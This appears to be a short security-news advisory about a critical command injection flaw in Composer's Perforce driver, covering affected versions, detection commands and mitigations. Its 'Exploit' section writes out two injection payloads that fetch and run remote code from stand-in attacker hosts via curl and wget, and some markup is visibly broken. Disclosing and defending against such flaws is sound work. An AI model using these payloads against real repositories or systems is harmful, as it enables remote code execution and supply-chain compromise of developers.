Listen to this Post
The vulnerability resides in Composer’s Perforce VCS driver. Two methods, Perforce::syncCodeBase() and Perforce::generateP4Command(), construct shell commands without proper escaping. The generateP4Command() method interpolates user-supplied connection parameters (port, user, client) taken directly from the source URL field in package metadata. The syncCodeBase() method appends the $sourceReference parameter to a shell command. An attacker controlling a Composer repository can serve metadata with type “perforce” and a malicious source reference containing shell metacharacters such as ;, |, $(), or backticks. When a victim installs or updates dependencies using `–prefer-source` (default for dev-prefixed versions like dev-master), Composer builds and executes a command like p4 -p
-u [bash] -c [bash]</code>. Even if Perforce is not installed on the system, Composer attempts to execute the crafted command, leading to arbitrary command injection. The injected commands run with the privileges of the Composer process. No user interaction is required beyond fetching packages from a compromised or malicious repository. The vulnerability is exploitable through any package that declares Perforce as its source type. Patches were released in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline). Workarounds include using `--prefer-dist` or setting `preferred-install: dist` in config, and trusting only known repositories.
Platform: Composer PHP dependency
Version: Before 2.2.27
Vulnerability : Command injection Perforce
Severity: Critical CVSS 9.8
date: 2026-04-14
<h2 style="color: blue;">Prediction: Patched version 2.2.27</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Check vulnerable Composer version
composer --version | grep -E "2.[0-9]+.[0-9]+"
Vulnerable if version < 2.2.27 or < 2.9.6
Detect malicious Perforce entries in composer.lock
jq '.packages[] | select(.source.type=="perforce")' composer.lock
Simulate injection test (safe)
echo '{"source":{"type":"perforce","reference":"$(id)"}}' | jq .
Exploit:
Craft a malicious composer.json repository entry: "source": { "type": "perforce", "reference": "$(curl attacker.com/shell.sh | bash)" }. When victim runs composer install --prefer-source, the injected command executes. Alternative: set source url to `localhost:1666; wget -O /tmp/backdoor http://evil.com/backdoor;`.
Protection from this CVE:
Upgrade to Composer 2.2.27 or 2.9.6. Use `composer config preferred-install dist` globally. Add `--prefer-dist` to all install/update commands. Only use trusted repositories (Packagist, private mirrors with integrity checks). Audit composer.lock for `source.type` "perforce".
Impact:
Arbitrary command execution on the developer's machine. Full system compromise, data theft, backdoor installation, or lateral movement in CI/CD pipelines. Supply chain attacks affecting all projects using the compromised repository.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

